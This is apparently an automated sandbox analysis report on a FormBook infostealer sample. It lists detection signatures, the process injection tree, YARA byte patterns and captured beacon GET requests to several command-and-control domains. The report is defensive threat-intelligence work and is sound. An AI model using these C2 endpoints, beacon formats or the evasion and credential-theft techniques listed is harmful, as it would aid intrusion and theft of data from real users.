Edit tour

Windows Analysis Report
SecuriteInfo.com.W32.AutoIt.YE.gen.Eldorado.12126.13851.exe

Overview

General Information

Sample name:	SecuriteInfo.com.W32.AutoIt.YE.gen.Eldorado.12126.13851.exe
Analysis ID:	1428501
MD5:	ce1f8921d525728d0903cb81e61ada9e
SHA1:	a0b7228ab142599fe9f8d06421abfb4589fdf00a
SHA256:	0382d0b9421be9a1c5a084869be5742803d4ec3f211294a4c96f45444952ab55
Tags:	exeFormbook
Infos:

Detection

FormBook

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for submitted file

Yara detected FormBook

Binary is likely a compiled AutoIt script file

Found direct / indirect Syscall (likely to bypass EDR)

Machine Learning detection for sample

Maps a DLL or memory area into another process

Modifies the context of a thread in another process (thread injection)

Performs DNS queries to domains with low reputation

Queues an APC in another process (thread injection)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Writes to foreign memory regions

Checks if the current process is being debugged

Connects to several IPs in different countries

Contains functionality for execution timing, often used to detect debuggers

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to block mouse and keyboard input (often used to hinder debugging)

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to communicate with device drivers

Contains functionality to dynamically determine API calls

Contains functionality to execute programs as a different user

Contains functionality to launch a process as a different user

Contains functionality to launch a program with higher privileges

Contains functionality to modify clipboard data

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to retrieve information about pressed keystrokes

Contains functionality to shutdown / reboot the system

Contains functionality to simulate keystroke presses

Contains functionality to simulate mouse events

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Extensive use of GetProcAddress (often used to hide API calls)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found evasive API chain (date check)

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

IP address seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

OS version to string mapping found (often used in BOTs)

Potential key logger detected (key state polling based)

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Uncommon Svchost Parent Process

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Process Tree

System is w10x64

SecuriteInfo.com.W32.AutoIt.YE.gen.Eldorado.12126.13851.exe (PID: 616 cmdline: "C:\Users\user\Desktop\SecuriteInfo.com.W32.AutoIt.YE.gen.Eldorado.12126.13851.exe" MD5: CE1F8921D525728D0903CB81E61ADA9E)

svchost.exe (PID: 2268 cmdline: "C:\Users\user\Desktop\SecuriteInfo.com.W32.AutoIt.YE.gen.Eldorado.12126.13851.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)

lXlvzubPaBLtjusO.exe (PID: 4548 cmdline: "C:\Program Files (x86)\iZsZrHSpCPcKUZaSYkKQgChuOiRBiyMdarZuyfLyjSJRJrbxCCb\lXlvzubPaBLtjusO.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)

netbtugc.exe (PID: 6432 cmdline: "C:\Windows\SysWOW64\netbtugc.exe" MD5: EE7BBA75B36D54F9E420EB6EE960D146)

lXlvzubPaBLtjusO.exe (PID: 4092 cmdline: "C:\Program Files (x86)\iZsZrHSpCPcKUZaSYkKQgChuOiRBiyMdarZuyfLyjSJRJrbxCCb\lXlvzubPaBLtjusO.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)

firefox.exe (PID: 6308 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Formbook, Formbo	FormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.	SWEED Cobalt	http://blog.inquest.net/blog/2018/06/22/a-look-at-formbook-stealer/ http://cambuz.blogspot.de/2016/06/form-grabber-2016-cromeffoperathunderbi.html http://www.vkremez.com/2018/01/lets-learn-dissecting-formbook.html https://any.run/cybersecurity-blog/xloader-formbook-encryption-analysis-and-malware-decryption/ https://asec.ahnlab.com/en/32149/	https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000002.00000002.2279781894.00000000034C0000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000002.00000002.2279781894.00000000034C0000.00000040.10000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2a6e0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x13d7f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000002.00000002.2278064790.0000000000400000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000002.00000002.2278064790.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2de63:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x17502:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000002.00000002.2281187991.0000000006E00000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000002.00000002.2281187991.0000000006E00000.00000040.10000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2cb478:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x2b4b17:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000004.00000002.4579123591.0000000003360000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000004.00000002.4579123591.0000000003360000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2a6e0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x13d7f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000004.00000002.4573035709.0000000003040000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000004.00000002.4573035709.0000000003040000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2a6e0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x13d7f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000003.00000002.4579078309.0000000005BB0000.00000040.00000001.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000003.00000002.4579078309.0000000005BB0000.00000040.00000001.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2cb478:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x2b4b17:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000004.00000002.4569356332.0000000000C20000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000004.00000002.4569356332.0000000000C20000.00000040.80000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2a6e0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x13d7f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
Click to see the 9 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
2.2.svchost.exe.400000.0.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
2.2.svchost.exe.400000.0.unpack	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2d063:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x16702:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
2.2.svchost.exe.400000.0.raw.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
2.2.svchost.exe.400000.0.raw.unpack	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2de63:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x17502:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

Sigma Signatures

System Summary

Sigma detected: Uncommon Svchost Parent Process

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\SecuriteInfo.com.W32.AutoIt.YE.gen.Eldorado.12126.13851.exe", CommandLine: "C:\Users\user\Desktop\SecuriteInfo.com.W32.AutoIt.YE.gen.Eldorado.12126.13851.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\SecuriteInfo.com.W32.AutoIt.YE.gen.Eldorado.12126.13851.exe", ParentImage: C:\Users\user\Desktop\SecuriteInfo.com.W32.AutoIt.YE.gen.Eldorado.12126.13851.exe, ParentProcessId: 616, ParentProcessName: SecuriteInfo.com.W32.AutoIt.YE.gen.Eldorado.12126.13851.exe, ProcessCommandLine: "C:\Users\user\Desktop\SecuriteInfo.com.W32.AutoIt.YE.gen.Eldorado.12126.13851.exe", ProcessId: 2268, ProcessName: svchost.exe

Sigma detected: Windows Processes Suspicious Parent Directory

Source: Process started

Author: vburov: Data: Command: "C:\Users\user\Desktop\SecuriteInfo.com.W32.AutoIt.YE.gen.Eldorado.12126.13851.exe", CommandLine: "C:\Users\user\Desktop\SecuriteInfo.com.W32.AutoIt.YE.gen.Eldorado.12126.13851.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\SecuriteInfo.com.W32.AutoIt.YE.gen.Eldorado.12126.13851.exe", ParentImage: C:\Users\user\Desktop\SecuriteInfo.com.W32.AutoIt.YE.gen.Eldorado.12126.13851.exe, ParentProcessId: 616, ParentProcessName: SecuriteInfo.com.W32.AutoIt.YE.gen.Eldorado.12126.13851.exe, ProcessCommandLine: "C:\Users\user\Desktop\SecuriteInfo.com.W32.AutoIt.YE.gen.Eldorado.12126.13851.exe", ProcessId: 2268, ProcessName: svchost.exe

Snort Signatures

⊘No Snort rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for domain / URL

Source: www.660danm.top	Virustotal: Detection: 10%	Perma Link
Source: empowermedeco.com	Virustotal: Detection: 6%	Perma Link
Source: www.antonio-vivaldi.mobi	Virustotal: Detection: 10%	Perma Link
Source: www.rssnewscast.com	Virustotal: Detection: 9%	Perma Link
Source: www.techchains.info	Virustotal: Detection: 9%	Perma Link
Source: www.magmadokum.com	Virustotal: Detection: 9%	Perma Link
Source: www.elettrosistemista.zip	Virustotal: Detection: 5%	Perma Link
Source: www.donnavariedades.com	Virustotal: Detection: 5%	Perma Link
Source: www.empowermedeco.com	Virustotal: Detection: 5%	Perma Link
Source: http://www.magmadokum.com/fo8o/	Virustotal: Detection: 9%	Perma Link
Source: http://www.660danm.top/fo8o/	Virustotal: Detection: 9%	Perma Link
Source: http://www.rssnewscast.com/fo8o/	Virustotal: Detection: 7%	Perma Link
Source: http://www.antonio-vivaldi.mobi/fo8o/	Virustotal: Detection: 10%	Perma Link
Source: http://www.empowermedeco.com	Virustotal: Detection: 5%	Perma Link
Source: http://www.techchains.info/fo8o/	Virustotal: Detection: 10%	Perma Link

Multi AV Scanner detection for submitted file

Source: SecuriteInfo.com.W32.AutoIt.YE.gen.Eldorado.12126.13851.exe	ReversingLabs: Detection: 23%
Source: SecuriteInfo.com.W32.AutoIt.YE.gen.Eldorado.12126.13851.exe	Virustotal: Detection: 23%			Perma Link

Yara detected FormBook

Source: Yara match	File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.2279781894.00000000034C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2278064790.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2281187991.0000000006E00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.4579123591.0000000003360000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.4573035709.0000000003040000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.4579078309.0000000005BB0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.4569356332.0000000000C20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

Machine Learning detection for sample

Source: SecuriteInfo.com.W32.AutoIt.YE.gen.Eldorado.12126.13851.exe

Joe Sandbox ML: detected

Source: SecuriteInfo.com.W32.AutoIt.YE.gen.Eldorado.12126.13851.exe

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source:	Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: lXlvzubPaBLtjusO.exe, 00000003.00000000.2195387708.0000000000E4E000.00000002.00000001.01000000.00000004.sdmp, lXlvzubPaBLtjusO.exe, 00000008.00000000.2351101955.0000000000E4E000.00000002.00000001.01000000.00000004.sdmp
Source:	Binary string: wntdll.pdbUGP source: SecuriteInfo.com.W32.AutoIt.YE.gen.Eldorado.12126.13851.exe, 00000000.00000003.2128199984.0000000003F40000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.W32.AutoIt.YE.gen.Eldorado.12126.13851.exe, 00000000.00000003.2127928332.0000000004090000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2279822618.000000000379E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2181745888.0000000003400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2179891285.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2279822618.0000000003600000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000003.2283353075.0000000003419000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000003.2279743002.0000000003268000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.4579692612.00000000035C0000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.4579692612.000000000375E000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: SecuriteInfo.com.W32.AutoIt.YE.gen.Eldorado.12126.13851.exe, 00000000.00000003.2128199984.0000000003F40000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.W32.AutoIt.YE.gen.Eldorado.12126.13851.exe, 00000000.00000003.2127928332.0000000004090000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000002.2279822618.000000000379E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2181745888.0000000003400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2179891285.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2279822618.0000000003600000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, netbtugc.exe, 00000004.00000003.2283353075.0000000003419000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000003.2279743002.0000000003268000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.4579692612.00000000035C0000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.4579692612.000000000375E000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: netbtugc.pdb source: svchost.exe, 00000002.00000003.2242578092.000000000301A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2279614138.0000000003000000.00000004.00000020.00020000.00000000.sdmp, lXlvzubPaBLtjusO.exe, 00000003.00000002.4576902587.0000000000C78000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: svchost.pdb source: netbtugc.exe, 00000004.00000002.4580670219.0000000003BEC000.00000004.10000000.00040000.00000000.sdmp, netbtugc.exe, 00000004.00000002.4576762013.000000000309E000.00000004.00000020.00020000.00000000.sdmp, lXlvzubPaBLtjusO.exe, 00000008.00000000.2351224393.00000000029EC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000A.00000002.2567856733.0000000003E4C000.00000004.80000000.00040000.00000000.sdmp
Source:	Binary string: svchost.pdbUGP source: netbtugc.exe, 00000004.00000002.4580670219.0000000003BEC000.00000004.10000000.00040000.00000000.sdmp, netbtugc.exe, 00000004.00000002.4576762013.000000000309E000.00000004.00000020.00020000.00000000.sdmp, lXlvzubPaBLtjusO.exe, 00000008.00000000.2351224393.00000000029EC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000A.00000002.2567856733.0000000003E4C000.00000004.80000000.00040000.00000000.sdmp
Source:	Binary string: netbtugc.pdbGCTL source: svchost.exe, 00000002.00000003.2242578092.000000000301A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2279614138.0000000003000000.00000004.00000020.00020000.00000000.sdmp, lXlvzubPaBLtjusO.exe, 00000003.00000002.4576902587.0000000000C78000.00000004.00000020.00020000.00000000.sdmp

Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AutoIt.YE.gen.Eldorado.12126.13851.exe	Code function: 0_2_009C4696 GetFileAttributesW,FindFirstFileW,FindClose,	0_2_009C4696
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AutoIt.YE.gen.Eldorado.12126.13851.exe	Code function: 0_2_009CC9C7 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	0_2_009CC9C7
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AutoIt.YE.gen.Eldorado.12126.13851.exe	Code function: 0_2_009CC93C FindFirstFileW,FindClose,	0_2_009CC93C
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AutoIt.YE.gen.Eldorado.12126.13851.exe	Code function: 0_2_009CF200 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_009CF200
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AutoIt.YE.gen.Eldorado.12126.13851.exe	Code function: 0_2_009CF35D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_009CF35D
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AutoIt.YE.gen.Eldorado.12126.13851.exe	Code function: 0_2_009CF65E FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_009CF65E
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AutoIt.YE.gen.Eldorado.12126.13851.exe	Code function: 0_2_009C3A2B FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_009C3A2B
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AutoIt.YE.gen.Eldorado.12126.13851.exe	Code function: 0_2_009C3D4E FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_009C3D4E
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AutoIt.YE.gen.Eldorado.12126.13851.exe	Code function: 0_2_009CBF27 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_009CBF27
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_00C3BAB0 FindFirstFileW,FindNextFileW,FindClose,	4_2_00C3BAB0

Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4x nop then xor eax, eax		4_2_00C29480
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4x nop then pop edi		4_2_00C2DD45

Networking

Performs DNS queries to domains with low reputation

Source:

DNS query: www.joyesi.xyz

Source: unknown

Network traffic detected: IP country count 11

Source: Joe Sandbox View	IP Address: 91.195.240.94 91.195.240.94
Source: Joe Sandbox View	IP Address: 195.110.124.133 195.110.124.133

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AutoIt.YE.gen.Eldorado.12126.13851.exe

Code function: 0_2_009D25E2 InternetReadFile,InternetQueryDataAvailable,InternetReadFile,

0_2_009D25E2

Source: global traffic	HTTP traffic detected: GET /fo8o/?VVq=lF_H&bD=IhZyPQIGe6uK3zP3twZWsYVeSSeNS0ZlW2eS79Xk6ut4afzj0LiRBEeFtQixSzG192fRs1GD25A478p7nOOnyIi7V/S5J9AzlXPHqpluzE36hxZsh30r8poflPmNwlfmk35jvL8= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8Accept-Language: en-US,enHost: www.3xfootball.comConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Source: global traffic	HTTP traffic detected: GET /fo8o/?bD=0LNqIGaAWMhMIMLJ2VJjkgaiCF/+7LEr9lFre+yu3/9GvRNYi1uHmkVftE7qrB4Q/AkDmlcR4eDvWrml8CJ8ssmc93kihOWHWb8NTA0vbQpCHGBmxgdm5sPEbG1Wvor0LSPPjnI=&VVq=lF_H HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8Accept-Language: en-US,enHost: www.kasegitai.tokyoConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Source: global traffic	HTTP traffic detected: GET /fo8o/?VVq=lF_H&bD=LFKqyrcu7g1NCa8cV1r2tNkohroduT6prIMLtaWgKJ9bBKQr4dsnyMPFpMQjJLGR7ieyxupOSpv1HbfUaMaFxgszkgIsi8wfa6/CPqkeX1kME9DjI2TvouO65OvKk6Nl8OEvQ/8= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8Accept-Language: en-US,enHost: www.goldenjade-travel.comConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Source: global traffic	HTTP traffic detected: GET /fo8o/?bD=PTl5gU/3CD/Xhg5Nd1HWi+eKOiJURJRFTZuVmm6gfrwSjnBrSraU/0GdHAsD0mFxNrARF0zWd8CLwvHKbs6Za05B0b8lb0SJyq2CvxKSeitE8AGVnlTlldZE82pgolkPyTnRDO8=&VVq=lF_H HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8Accept-Language: en-US,enHost: www.antonio-vivaldi.mobiConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Source: global traffic	HTTP traffic detected: GET /fo8o/?VVq=lF_H&bD=qL3nKp+YSjoaTomgQjyPoknaJzFflnvGMW8DXsDTZ4AADrD7Wpn1i04piMS1+AOWgCBMohpgbh6Cuut9PSzjNWAySNtnq/EMXCTP7S4oEh8mb9sAZyquFiTVTuU6HpMKOeASrGw= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8Accept-Language: en-US,enHost: www.magmadokum.comConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Source: global traffic	HTTP traffic detected: GET /fo8o/?bD=x3jV/ECx7FuzXOI5niBKCyXhuUkTi7THyCIVaqWvGMMqpfz0YC5wLsL1wYxwFH1KuInYTmXKqKNNujOvwtdNp7YHjVi2aBezyBUOenUja13YBEIShwN33HoHbXtrY+oqbh1getk=&VVq=lF_H HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8Accept-Language: en-US,enHost: www.rssnewscast.comConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Source: global traffic	HTTP traffic detected: GET /fo8o/?bD=vefd0teQh+kbruh5/qap98pA+QvvtGaRDgCUoL90YCYLczV+Hcc/TcCCUPfrz9W5FQiF6ivoXpNecnmrfO5haoQH1WjEWithRFLxLKOV4ce9fWCCnKIVX4jHNmrNLQZpWctVBLU=&VVq=lF_H HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8Accept-Language: en-US,enHost: www.techchains.infoConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Source: global traffic	HTTP traffic detected: GET /fo8o/?VVq=lF_H&bD=bO1UBvtoHFNUmlWGmXL3o3L5Dhw+Vy81qF418M7UHpKKa2cgLZsmM/SsbGGojtls67Xc6OgTo57aJm1+bsxMMgl3a4mkxzPbkN9BQKjpJMF6ezHcknvvvjzNmyPcHDwhODu1wVk= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8Accept-Language: en-US,enHost: www.elettrosistemista.zipConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
